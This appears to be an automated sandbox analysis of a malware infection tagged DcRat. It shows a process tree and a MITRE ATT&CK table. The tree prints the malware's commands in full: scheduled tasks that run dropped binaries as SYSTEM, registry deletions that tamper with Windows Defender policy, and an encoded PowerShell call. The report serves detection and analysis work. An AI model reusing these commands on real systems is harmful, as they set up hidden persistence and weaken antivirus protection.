                                                                                                                                                                                                                                                                                                                                                            schtasks /CREATE /TN "HqggdVJZxuzvaULcA" /SC once /ST 14:17:54 /RU "SYSTEM" /TR "\"C:\Windows\Temp\fwhiGQHhSfnZUzkc\sjPeeWCTnrqbGVf\CblaPyW.exe\" Av /site_id 525403 /S" /V1 /F
                                                                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                                                                            • DcRat
                                                                                                                                                                                                                                                                                                                                                            • Drops file in Windows directory
                                                                                                                                                                                                                                                                                                                                                            • Creates scheduled task(s)
                                                                                                                                                                                                                                                                                                                                                            PID:83944
                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                                                                                                            schtasks /run /I /tn "HqggdVJZxuzvaULcA"
                                                                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                                                                              PID:83984
                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\system32\gpscript.exe
                                                                                                                                                                                                                                                                                                                                                            gpscript.exe /RefreshSystemParam
                                                                                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                                                                                              PID:82636
                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\Temp\fwhiGQHhSfnZUzkc\sjPeeWCTnrqbGVf\ptjbjED.exe
                                                                                                                                                                                                                                                                                                                                                              C:\Windows\Temp\fwhiGQHhSfnZUzkc\sjPeeWCTnrqbGVf\ptjbjED.exe Av /site_id 525403 /S
                                                                                                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                                                                                              • Checks computer location settings
                                                                                                                                                                                                                                                                                                                                                              • Drops Chrome extension
                                                                                                                                                                                                                                                                                                                                                              • Drops desktop.ini file(s)
                                                                                                                                                                                                                                                                                                                                                              • Drops file in System32 directory
                                                                                                                                                                                                                                                                                                                                                              • Drops file in Program Files directory
                                                                                                                                                                                                                                                                                                                                                              • Modifies data under HKEY_USERS
                                                                                                                                                                                                                                                                                                                                                              PID:82696
                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                                                                                                                schtasks /DELETE /F /TN "bGZpGlqvDNKjraWjlZ"
                                                                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                                                                  PID:82760
                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                  cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32
                                                                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                                                                    PID:82812
                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                                                                                      REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32
                                                                                                                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                                                                                                                        PID:82880
                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                      cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64
                                                                                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                                                                                        PID:82912
                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                                                                                          REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64
                                                                                                                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                                                                                                                            PID:82968
                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                                                                                                                          schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\jIUrjTqJU\EBqZLy.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "IyXvSOFErlMUKai" /V1 /F
                                                                                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                                                                                          • DcRat
                                                                                                                                                                                                                                                                                                                                                                          • Drops file in Windows directory
                                                                                                                                                                                                                                                                                                                                                                          • Creates scheduled task(s)
                                                                                                                                                                                                                                                                                                                                                                          PID:82996
                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                                                                                                                          schtasks /CREATE /TN "IyXvSOFErlMUKai2" /F /xml "C:\Program Files (x86)\jIUrjTqJU\zGydWzs.xml" /RU "SYSTEM"
                                                                                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                                                                                          • DcRat
                                                                                                                                                                                                                                                                                                                                                                          • Creates scheduled task(s)
                                                                                                                                                                                                                                                                                                                                                                          PID:85048
                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                                                                                                                          schtasks /END /TN "IyXvSOFErlMUKai"
                                                                                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                                                                                            PID:85132
                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                                                                                                                            schtasks /DELETE /F /TN "IyXvSOFErlMUKai"
                                                                                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                                                                                              PID:85212
                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                                                                                                                              schtasks /CREATE /TN "hNhPffLFSWePjj" /F /xml "C:\Program Files (x86)\twylNxKJekDU2\weptNnJ.xml" /RU "SYSTEM"
                                                                                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                                                                                              • DcRat
                                                                                                                                                                                                                                                                                                                                                                              • Creates scheduled task(s)
                                                                                                                                                                                                                                                                                                                                                                              PID:85400
                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                                                                                                                              schtasks /CREATE /TN "AzbKTkTFnqewi2" /F /xml "C:\ProgramData\CEEEIGvNcEpIBnVB\UCiLOnU.xml" /RU "SYSTEM"
                                                                                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                                                                                              • DcRat
                                                                                                                                                                                                                                                                                                                                                                              • Creates scheduled task(s)
                                                                                                                                                                                                                                                                                                                                                                              PID:85452
                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                                                                                                                              schtasks /CREATE /TN "WeBOqsSYMRAwVFzkb2" /F /xml "C:\Program Files (x86)\VnSvEXTIbraTatzTOsR\mltWrWv.xml" /RU "SYSTEM"
                                                                                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                                                                                              • DcRat
                                                                                                                                                                                                                                                                                                                                                                              • Creates scheduled task(s)
                                                                                                                                                                                                                                                                                                                                                                              PID:85536
                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                                                                                                                              schtasks /CREATE /TN "gmafinJubMSteXSrfVu2" /F /xml "C:\Program Files (x86)\LCMDmHxGrLJHC\cyZLTvM.xml" /RU "SYSTEM"
                                                                                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                                                                                              • DcRat
                                                                                                                                                                                                                                                                                                                                                                              • Creates scheduled task(s)
                                                                                                                                                                                                                                                                                                                                                                              PID:85636
                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                                                                                                                              schtasks /CREATE /TN "xIKpqZCbfAFzyvQlk" /SC once /ST 07:35:06 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\fwhiGQHhSfnZUzkc\oNWgvQcK\UWiQNPG.dll\",#1 /site_id 525403" /V1 /F
                                                                                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                                                                                              • DcRat
                                                                                                                                                                                                                                                                                                                                                                              • Drops file in Windows directory
                                                                                                                                                                                                                                                                                                                                                                              • Creates scheduled task(s)
                                                                                                                                                                                                                                                                                                                                                                              PID:89672
                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                                                                                                                              schtasks /run /I /tn "xIKpqZCbfAFzyvQlk"
                                                                                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                                                                                                PID:89752
                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:32
                                                                                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                                                                                  PID:89880
                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                                                                                                    REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:32
                                                                                                                                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                                                                                                                                      PID:89996
                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                    cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:64
                                                                                                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                                                                                                      PID:90060
                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                                                                                                        REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:64
                                                                                                                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                                                                                                                          PID:90100
                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                                                                                                                                        schtasks /DELETE /F /TN "HqggdVJZxuzvaULcA"
                                                                                                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                                                                                                          PID:89372
                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\system32\gpscript.exe
                                                                                                                                                                                                                                                                                                                                                                                        gpscript.exe /RefreshSystemParam
                                                                                                                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                                                                                                                          PID:82724
                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\system32\gpscript.exe
                                                                                                                                                                                                                                                                                                                                                                                          gpscript.exe /RefreshSystemParam
                                                                                                                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                                                                                                                            PID:82732
                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 600 -p 79548 -ip 79548
                                                                                                                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                                                                                                                              PID:83556
                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\Temp\fwhiGQHhSfnZUzkc\sjPeeWCTnrqbGVf\CblaPyW.exe
                                                                                                                                                                                                                                                                                                                                                                                              C:\Windows\Temp\fwhiGQHhSfnZUzkc\sjPeeWCTnrqbGVf\CblaPyW.exe Av /site_id 525403 /S
                                                                                                                                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                                                                                                                              • Checks computer location settings
                                                                                                                                                                                                                                                                                                                                                                                              • Drops Chrome extension
                                                                                                                                                                                                                                                                                                                                                                                              • Drops file in System32 directory
                                                                                                                                                                                                                                                                                                                                                                                              • Drops file in Program Files directory
                                                                                                                                                                                                                                                                                                                                                                                              • Modifies data under HKEY_USERS
                                                                                                                                                                                                                                                                                                                                                                                              PID:84024
                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                                                                                                                                                schtasks /DELETE /F /TN "bGZpGlqvDNKjraWjlZ"
                                                                                                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                                                                                                  PID:84080
                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                  cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32
                                                                                                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                                                                                                    PID:84120
                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                                                                                                                      REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32
                                                                                                                                                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                                                                                                                                                        PID:84160
                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                      cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64
                                                                                                                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                                                                                                                        PID:84176
                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                                                                                                                          REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64
                                                                                                                                                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                                                                                                                                                            PID:84212
                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                                                                                                                                                          schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\jIUrjTqJU\rdZnQr.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "IyXvSOFErlMUKai" /V1 /F
                                                                                                                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                                                                                                                          • DcRat
                                                                                                                                                                                                                                                                                                                                                                                                          • Drops file in Windows directory
                                                                                                                                                                                                                                                                                                                                                                                                          • Creates scheduled task(s)
                                                                                                                                                                                                                                                                                                                                                                                                          PID:84228
                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                                                                                                                                                          schtasks /CREATE /TN "IyXvSOFErlMUKai2" /F /xml "C:\Program Files (x86)\jIUrjTqJU\xFUFQGr.xml" /RU "SYSTEM"
                                                                                                                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                                                                                                                          • DcRat
                                                                                                                                                                                                                                                                                                                                                                                                          • Creates scheduled task(s)
                                                                                                                                                                                                                                                                                                                                                                                                          PID:85008
                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                                                                                                                                                          schtasks /END /TN "IyXvSOFErlMUKai"
                                                                                                                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                                                                                                                            PID:85092
                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                                                                                                                                                            schtasks /DELETE /F /TN "IyXvSOFErlMUKai"
                                                                                                                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                                                                                                                              PID:85156
                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                                                                                                                                                              schtasks /CREATE /TN "hNhPffLFSWePjj" /F /xml "C:\Program Files (x86)\twylNxKJekDU2\ujAmmzo.xml" /RU "SYSTEM"
                                                                                                                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                                                                                                                              • DcRat
                                                                                                                                                                                                                                                                                                                                                                                                              • Creates scheduled task(s)
                                                                                                                                                                                                                                                                                                                                                                                                              PID:85256
                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                                                                                                                                                              schtasks /CREATE /TN "AzbKTkTFnqewi2" /F /xml "C:\ProgramData\CEEEIGvNcEpIBnVB\zigGDUO.xml" /RU "SYSTEM"
                                                                                                                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                                                                                                                              • DcRat
                                                                                                                                                                                                                                                                                                                                                                                                              • Creates scheduled task(s)
                                                                                                                                                                                                                                                                                                                                                                                                              PID:85300
                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                                                                                                                                                              schtasks /CREATE /TN "WeBOqsSYMRAwVFzkb2" /F /xml "C:\Program Files (x86)\VnSvEXTIbraTatzTOsR\zKBONqO.xml" /RU "SYSTEM"
                                                                                                                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                                                                                                                              • DcRat
                                                                                                                                                                                                                                                                                                                                                                                                              • Creates scheduled task(s)
                                                                                                                                                                                                                                                                                                                                                                                                              PID:85492
                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                                                                                                                                                              schtasks /CREATE /TN "gmafinJubMSteXSrfVu2" /F /xml "C:\Program Files (x86)\LCMDmHxGrLJHC\QMInpgo.xml" /RU "SYSTEM"
                                                                                                                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                                                                                                                              • DcRat
                                                                                                                                                                                                                                                                                                                                                                                                              • Creates scheduled task(s)
                                                                                                                                                                                                                                                                                                                                                                                                              PID:85568
                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                              cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:32
                                                                                                                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                PID:85712
                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:32
                                                                                                                                                                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                    PID:89652
                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:64
                                                                                                                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                    PID:89712
                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                      REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:64
                                                                                                                                                                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                        PID:89824
                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                                                                                                                                                                      schtasks /DELETE /F /TN "HqggdVJZxuzvaULcA"
                                                                                                                                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                        PID:89944
                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 79548 -ip 79548
                                                                                                                                                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                        PID:84368
                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 604 -p 79548 -ip 79548
                                                                                                                                                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                          PID:84464
                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 604 -p 79548 -ip 79548
                                                                                                                                                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                            PID:84544
                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 78296 -ip 78296
                                                                                                                                                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                              PID:84744
                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 600 -p 79548 -ip 79548
                                                                                                                                                                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                PID:84756
                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\system32\rundll32.EXE
                                                                                                                                                                                                                                                                                                                                                                                                                                C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\fwhiGQHhSfnZUzkc\oNWgvQcK\UWiQNPG.dll",#1 /site_id 525403
                                                                                                                                                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:89792
                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                    C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\fwhiGQHhSfnZUzkc\oNWgvQcK\UWiQNPG.dll",#1 /site_id 525403
                                                                                                                                                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                    • Checks BIOS information in registry
                                                                                                                                                                                                                                                                                                                                                                                                                                    • Loads dropped DLL
                                                                                                                                                                                                                                                                                                                                                                                                                                    • Enumerates system info in registry
                                                                                                                                                                                                                                                                                                                                                                                                                                    • Modifies data under HKEY_USERS
                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:89808
                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      schtasks /DELETE /F /TN "xIKpqZCbfAFzyvQlk"
                                                                                                                                                                                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:90016
                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\3F71.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Roaming\3F71.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                    • Checks computer location settings
                                                                                                                                                                                                                                                                                                                                                                                                                                    • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:89568
                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAAMwA0AA==
                                                                                                                                                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:90212
                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\3F71.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Roaming\3F71.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:90584
                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\system32\WerFault.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Windows\system32\WerFault.exe -pss -s 408 -p 84436 -ip 84436
                                                                                                                                                                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:90444
                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\system32\WerFault.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                          C:\Windows\system32\WerFault.exe -u -p 84436 -s 1104
                                                                                                                                                                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Program crash
                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:90472

                                                                                                                                                                                                                                                                                                                                                                                                                                        Network

                                                                                                                                                                                                                                                                                                                                                                                                                                        MITRE ATT&CK Matrix ATT&CK v6

                                                                                                                                                                                                                                                                                                                                                                                                                                        Initial Access

                                                                                                                                                                                                                                                                                                                                                                                                                                        Execution

                                                                                                                                                                                                                                                                                                                                                                                                                                        Scripting

                                                                                                                                                                                                                                                                                                                                                                                                                                        1
                                                                                                                                                                                                                                                                                                                                                                                                                                        T1064

                                                                                                                                                                                                                                                                                                                                                                                                                                        Scheduled Task

                                                                                                                                                                                                                                                                                                                                                                                                                                        1
                                                                                                                                                                                                                                                                                                                                                                                                                                        T1053

                                                                                                                                                                                                                                                                                                                                                                                                                                        Persistence

                                                                                                                                                                                                                                                                                                                                                                                                                                        Modify Existing Service

                                                                                                                                                                                                                                                                                                                                                                                                                                        2
                                                                                                                                                                                                                                                                                                                                                                                                                                        T1031

                                                                                                                                                                                                                                                                                                                                                                                                                                        Registry Run Keys / Startup Folder

                                                                                                                                                                                                                                                                                                                                                                                                                                        1
                                                                                                                                                                                                                                                                                                                                                                                                                                        T1060

                                                                                                                                                                                                                                                                                                                                                                                                                                        Scheduled Task

                                                                                                                                                                                                                                                                                                                                                                                                                                        1
                                                                                                                                                                                                                                                                                                                                                                                                                                        T1053

                                                                                                                                                                                                                                                                                                                                                                                                                                        Privilege Escalation

                                                                                                                                                                                                                                                                                                                                                                                                                                        Scheduled Task

                                                                                                                                                                                                                                                                                                                                                                                                                                        1
                                                                                                                                                                                                                                                                                                                                                                                                                                        T1053

                                                                                                                                                                                                                                                                                                                                                                                                                                        Defense Evasion

                                                                                                                                                                                                                                                                                                                                                                                                                                        Modify Registry

                                                                                                                                                                                                                                                                                                                                                                                                                                        5
                                                                                                                                                                                                                                                                                                                                                                                                                                        T1112

                                                                                                                                                                                                                                                                                                                                                                                                                                        Disabling Security Tools

                                                                                                                                                                                                                                                                                                                                                                                                                                        1
                                                                                                                                                                                                                                                                                                                                                                                                                                        T1089

                                                                                                                                                                                                                                                                                                                                                                                                                                        Virtualization/Sandbox Evasion

                                                                                                                                                                                                                                                                                                                                                                                                                                        1
                                                                                                                                                                                                                                                                                                                                                                                                                                        T1497

                                                                                                                                                                                                                                                                                                                                                                                                                                        File Permissions Modification

                                                                                                                                                                                                                                                                                                                                                                                                                                        1
                                                                                                                                                                                                                                                                                                                                                                                                                                        T1222

                                                                                                                                                                                                                                                                                                                                                                                                                                        Scripting

                                                                                                                                                                                                                                                                                                                                                                                                                                        1
                                                                                                                                                                                                                                                                                                                                                                                                                                        T1064

                                                                                                                                                                                                                                                                                                                                                                                                                                        Install Root Certificate

                                                                                                                                                                                                                                                                                                                                                                                                                                        1
                                                                                                                                                                                                                                                                                                                                                                                                                                        T1130

                                                                                                                                                                                                                                                                                                                                                                                                                                        Credential Access

                                                                                                                                                                                                                                                                                                                                                                                                                                        Credentials in Files

                                                                                                                                                                                                                                                                                                                                                                                                                                        3
                                                                                                                                                                                                                                                                                                                                                                                                                                        T1081

                                                                                                                                                                                                                                                                                                                                                                                                                                        Discovery

                                                                                                                                                                                                                                                                                                                                                                                                                                        Query Registry

                                                                                                                                                                                                                                                                                                                                                                                                                                        7
                                                                                                                                                                                                                                                                                                                                                                                                                                        T1012

                                                                                                                                                                                                                                                                                                                                                                                                                                        Virtualization/Sandbox Evasion

                                                                                                                                                                                                                                                                                                                                                                                                                                        1
                                                                                                                                                                                                                                                                                                                                                                                                                                        T1497

                                                                                                                                                                                                                                                                                                                                                                                                                                        System Information Discovery

                                                                                                                                                                                                                                                                                                                                                                                                                                        7
                                                                                                                                                                                                                                                                                                                                                                                                                                        T1082

                                                                                                                                                                                                                                                                                                                                                                                                                                        Peripheral Device Discovery

                                                                                                                                                                                                                                                                                                                                                                                                                                        1
                                                                                                                                                                                                                                                                                                                                                                                                                                        T1120

                                                                                                                                                                                                                                                                                                                                                                                                                                        Process Discovery

